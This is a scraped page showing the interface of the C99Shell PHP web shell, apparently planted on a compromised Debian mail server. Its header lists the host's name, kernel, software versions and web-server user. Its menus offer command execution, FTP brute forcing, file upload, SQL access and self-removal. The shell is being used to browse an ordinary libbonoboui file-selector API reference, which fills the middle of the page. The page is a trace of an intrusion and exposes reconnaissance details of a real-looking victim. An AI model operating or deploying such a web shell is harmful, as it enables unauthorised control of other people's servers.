!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/libbonoboui2-common/html/   drwxr-xr-x
Free 129.59 GB of 142.11 GB (91.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     libbonoboui-bonobo-file-selector-util.html (11.81 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
bonobo-file-selector-util

bonobo-file-selector-util

bonobo-file-selector-util

Synopsis

char *              bonobo_file_selector_open           (GtkWindow *parent,
                                                         gboolean enable_vfs,
                                                         const char *title,
                                                         const char *mime_types,
                                                         const char *default_path);
char **             bonobo_file_selector_open_multi     (GtkWindow *parent,
                                                         gboolean enable_vfs,
                                                         const char *title,
                                                         const char *mime_types,
                                                         const char *default_path);
char *              bonobo_file_selector_save           (GtkWindow *parent,
                                                         gboolean enable_vfs,
                                                         const char *title,
                                                         const char *mime_types,
                                                         const char *default_path,
                                                         const char *default_filename);

Description

Details

bonobo_file_selector_open ()

char *              bonobo_file_selector_open           (GtkWindow *parent,
                                                         gboolean enable_vfs,
                                                         const char *title,
                                                         const char *mime_types,
                                                         const char *default_path);

Creates and shows a modal open file dialog, waiting for the user to select a file or cancel before returning.

parent :

optional window the dialog should be a transient for.

enable_vfs :

if FALSE, restrict files to local paths.

title :

optional window title to use

mime_types :

optional list of mime types to provide filters for. These are of the form: "HTML Files:text/html|Text Files:text/html,text/plain"

default_path :

optional directory to start in

Returns :

the URI (or plain file path if enable_vfs is FALSE) of the file selected, or NULL if cancel was pressed.

bonobo_file_selector_open_multi ()

char **             bonobo_file_selector_open_multi     (GtkWindow *parent,
                                                         gboolean enable_vfs,
                                                         const char *title,
                                                         const char *mime_types,
                                                         const char *default_path);

Creates and shows a modal open file dialog, waiting for the user to select a file or cancel before returning.

parent :

optional window the dialog should be a transient for

enable_vfs :

if FALSE, restrict files to local paths.

title :

optional window title to use

mime_types :

optional list of mime types to provide filters for. These are of the form: "HTML Files:text/html|Text Files:text/html,text/plain"

default_path :

optional directory to start in

Returns :

a NULL terminated string array of the selected URIs (or local file paths if enable_vfs is FALSE), or NULL if cancel was pressed.

bonobo_file_selector_save ()

char *              bonobo_file_selector_save           (GtkWindow *parent,
                                                         gboolean enable_vfs,
                                                         const char *title,
                                                         const char *mime_types,
                                                         const char *default_path,
                                                         const char *default_filename);

Creates and shows a modal save file dialog, waiting for the user to select a file or cancel before returning.

parent :

optional window the dialog should be a transient for

enable_vfs :

if FALSE, restrict files to local paths.

title :

optional window title to use

mime_types :

optional list of mime types to provide filters for. These are of the form: "HTML Files:text/html|Text Files:text/html,text/plain"

default_path :

optional directory to start in

default_filename :

optional file name to default to

Returns :

the URI (or plain file path if enable_vfs is FALSE) of the file selected, or NULL if cancel was pressed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0081 ]--